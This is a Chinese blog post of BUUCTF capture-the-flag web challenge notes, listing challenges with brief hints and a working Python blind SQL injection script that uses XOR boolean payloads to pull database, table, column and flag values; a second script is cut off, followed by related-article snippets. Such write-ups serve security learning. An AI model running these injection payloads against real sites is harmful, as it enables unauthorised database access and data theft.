buuctf刷题之旅(三) 知识点+坑

最新推荐文章于 2025-03-26 21:57:13 发布
原创 最新推荐文章于 2025-03-26 21:57:13 发布 · 2.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ctf

这篇博客汇总了多种Web安全漏洞利用技术,包括SQL注入、SSRF、JWT漏洞、文件描述符利用、模板注入等,并展示了不同CTF比赛中的解题策略,如ASCII位偏移、正则绕过、PHP反序列化等。还提到了一些工具如Arjun、tplmap在渗透测试中的应用。

[NCTF2019]True XML cookbook

WP

最后一位不一定是11,需要自己内网探测

打2021的geek大挑战了

[MRCTF2020]套娃

WP

[极客大挑战 2019]RCE ME

WP

[CISCN2019 华北赛区 Day1 Web2]ikun

JWT、pickle反序列化

WP

[WUSTCTF2020]颜值成绩查询

import requests

url= 'http://b91f52c4-276b-4113-9ede-54fb712ac6da.node3.buuoj.cn/'

database =""

payload1 = "?stunum=1^(ascii(substr((select(database())),{},1))>{})^1" #库名为ctf
payload2 = "?stunum=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{},1))>{})^1"#表名为flag,score
payload3 ="?stunum=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),{},1))>{})^1" #列名为flag,value
payload4 = "?stunum=1^(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))>{})^1" #
for i in range(1,10000):
    low = 32
    high = 128
    mid =(low + high) // 2
    while(low < high):
        # payload = payload1.format(i,mid)  #查库名
        # payload = payload2.format(i,mid)  #查表名
        # payload = payload3.format(i,mid)  #查列名
        payload = payload4.format(i,mid) #查flag

        new_url = url + payload
        r = requests.get(new_url)
        print(new_url)
        if "Hi admin, your score is: 100" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) //2
    if (mid == 32 or mid == 132):
        break
    database +=chr(mid)
    print(database)

print(database)

[FBCTF2019]RCEService

WP

涉及利用换行绕过匹配,利用回溯次数绕过匹配

json序列化

[CISCN2019 华北赛区 Day1 Web1]Dropbox

WP

0x80、0xff绕过正则匹配

[CISCN2019 总决赛 Day2 Web1]Easyweb

好一个渗透啊,好题

WP

网上脚本不是很好用,自己改了改之前的盲注:

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/9/10 14:38
import requests

url = "http://e2d4c3c6-a35f-49c7-9380-62b762460069.node4.buuoj.cn:81/image.php?"

flag = ""
i = 0
while True:
    i += 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # 查库名
        # payload = "database()"
        # 查表名字
        # payload = "select
最低0.47元/天 解锁文章
buuctf
小飒的博客
07-11 398
重温一下buuctf前面的目 hint: flag in ffffllllaaaagggg mb_substr() 函数返回字符串的一部分mb_strpos():返回要查找的字符串在别一个字符串中首次出现的位置checkFile函数的作用: 判断page是否被设置,是否为字符串 判断page是否在whitelist中 以?为分割符取出之前的字符,保存在page判断_page 判断p​age判断_page是否在whitelist中 url解码后以?为分割符取出之前字符,判断是否在whitelist中?fil
BUUCTF系列
qq_45655564的博客
07-11 622
[HCTF 2018]WarmUp 查看网页源代码,得到source.php 可以得到 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
BUUCTF
Oops-re的博客
09-24 278
BUUCTF 1.不一样的flag IDA32打开文件,并找到main函数,F5进入伪代码界面,从头分析 void main() { char v0; // [sp+17h] [bp-35h]@1 int v1; // [sp+30h] [bp-1Ch]@1 int v2; // [sp+34h] [bp-18h]@1 signed int v3; // [sp+38h] [bp-14h]@2 signed int i; // [sp+3Ch] [bp-10h]@14 int v
BUUCTF——MISC部分(1-20
jsdhwdmaz78的博客
10-27 3086
网站:https://buuoj.cn/
BUUCTF 记录
best_Floats的博客
05-25 1440
然后再用ls查看,发现一个flag.txt文件,用cat命令进行查看,就可以看到flag了。先用ls命令看看有什么东西没有,发现没有返回的东西,说明一开始就进去了一个空的文件夹。这道主要考查的是ssh的知识,需要远程用ssh连接上这台虚拟机。这时我们可以用cd..这个命令去返回上一级。格式是:ssh -p 端口 用户名@网址。然后输入yes和密码,就成功连接上。打开了这个网页之后其实并没有什么用。我们需要通过主机cmd去用ssh链接。目中给了地址、端口、账号和密码。
buuctf之旅之web()
qq_50589021的博客
08-17 6846
2021-01-15 第一:[HCTF 2018]WarmUp 这里懒得上传图片了,所以就直接笔记了 源代码里面有1.source.php,所以打开以后还会发先2.hint.php 1打开后会发现是代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["s
buuctf记录
weixin_53409153的博客
05-25 435
最近这段时间除了再写iscc外(当然,我比较菜,会做的有限,但是也还是在学习的过程中)在其他时候,也是会写一点buuctf上的的。在加上一点以前写的一部分,算下来也有20多道,现在就统一记录一下吧,后面要是在了,在往后面补充。 easyre 这道其实不用多说,拿道后,直接查壳,发现无壳,且是64位的,拖入IDA中Shift+F12就可以直接看到falg 得到flag{this_Is_a_EaSyRe} reverse1 其实大部分逆向的,在最开始的地方还是很像的,这依旧是查壳, 无壳,
BUUCTF之路--ez_pz_hackover_20161
qq_30528603的博客
06-28 488
因此这个函数里是存在栈溢出漏洞的,我们需要执行这个函数。因此我们需要在一开始的输入就构造好我们的shellcode,和shellcode的地址。根据IDA的提示,s数组应该在ebp的上面0x40c个字节处,而dest应该在ebp上面的0x32字节处.但是当我进行输入调试的时候发现ebp在我输入缓冲区的上面。ebp的偏移看到是0x38,我们输入的位置是0x22 ,因为63是c,72是r,0000不是我们输入的。将计就计,既然我们只有一次输入机会,那么我们构造完返回地址后,肯定跟的是我们的shellcode。
BUUCTF之路-rip1
qq_30528603的博客
05-25 3949
因为A存入内存是以ASCLL码形式存在 0x41就是A,我们填入的15个A已经在栈上了,而且返回地址就是401100,我们要做的就是覆盖这个返回地址,指向我们的后门函数fun,至此这就完成了。让我们能得到一个shell.那我们就找一下这个fun函数的地址,因为目没有开启PIE,所以程序每次加载的地址都是不变的。可以看到保护基本没开,是个很简单的栈溢出目。左边这都是函数,带下划线的一般是系统提供的函数,我们分析前可以大致看看有哪些函数,都干了什么,对整体布局有个了解,我们一开始都回去分析main函数。
BUUCTF日记)
weixin_74022830的博客
03-23 1214
BUUCTFweb记录
BUUCTF记录
2301_78965658的博客
09-04 889
现在是暑假第四周,BUU现在是正在页。加油学,只要能不断超越过去的自己,就是最值得骄傲的事。
[buuctf]记录
qq_61109509的博客
05-14 848
[网鼎杯 2018]Fakebook 考点 SSRF 新学: dirsearch使用 sqlmap ssrf 反序列化 绕过waf的联合注入 dirsearch使用桌面 python dirsearch.py -u 网址 -e * dirmap使用在kali ssrf 它是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞。因为它是由服务端发起的,所以它能够请求到与它相连但与外网隔离的内部系统。 一般由curl的滥用引起。 ...
BUUCTF-web
最新发布
m0_65853019的博客
03-26 1002
ffffllllaaaagggg,打开文件之后发现没有什么关键信息,应该是键入的路径不对,但是我们不清楚它的具体位置,所以用5次../返回,即键入source.php?file=php://filter/read=convert.base64-encode/resource=flag.php,打开文件后得到伪代码,使用工具进行解码得到源代码,即。从带有GET 方法的表单发送的信息,对任何人都是可见的(会显示在浏览器的地址栏),并且对发送的信息量也有限制(最多 100 个字符)127.0.0.1;
BUUCTF总结(基础篇)
weixin_51614272的博客
05-15 2597
目录[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Upload[极客大挑战 2019]BabySQL[ACTF2020 新生赛]Upload[极客大挑战 2019]BuyFlag[ACTF2020 新生赛]BackupFile[BJDCTF2020]Easy MD5[RoarCTF 2019]Easy Calc[HCTF 2018]admin[MRCTF2020]你传你🐎呢 [GXYCTF2019]Ping Ping Ping 知识点:命令执行 绕过: ; 来拼接命令 $I
BUUCTF MISC
wuwuliuliu0524的博客
01-12 8283
1、BUUCTF的LSB 网上教程有很多,具体就是Analyse->Data Extract,选中RGB通道的0,然后Save Bin保存为png就行了 2:BUUCTF的镜子里面的世界 binwalk发现里面没有 用stegslove 3:BUUCTFningen binwalk发现里面有一个压缩包,打开需要密码 尝试爆破,根据提示应该是4位数,爆破得到密码8368,解开得到flag{b025fc9ca797a67d2103bfbc407a6d5f} ...
BUUCTF笔记
追求卓越,技术流~
03-24 7196
BUUCTF笔记 [极客大挑战 2019]BabySQL 从这句话我们可以看出,这个网站的后台是做了过滤处理的 这个时候我们先用万能密码实验一下看看,是什么类型的SQL注入 输入1‘,看看返回的结果 返回结果说明这个是字符型的SQL注入 下面我们来进行一下注释 发现是这个结果,所以肯定了我们的猜测 下面要进行的是对其中的列进行爆破 输入: 1' order by 3 # 可以看到再其中没有or 我们采取的是对其进行重复的拼写进行绕过后台过滤 输入: 1’ oorrder by 3#`
BUUCTF十一道(06)
qq_45837896的博客
07-29 1954
BUUCTF十一道
buuctfweb
01-17
### BUUCTF Web 类型练习 #### 网站源码备份文件泄露和PHP反序列化 在BUUCTF平台上,有一道涉及网站源码备份文件泄露和PHP反序列化的目。这类目通常要求参赛者找到并利用服务器上存在的`.bak`或其他...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Yn8rt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值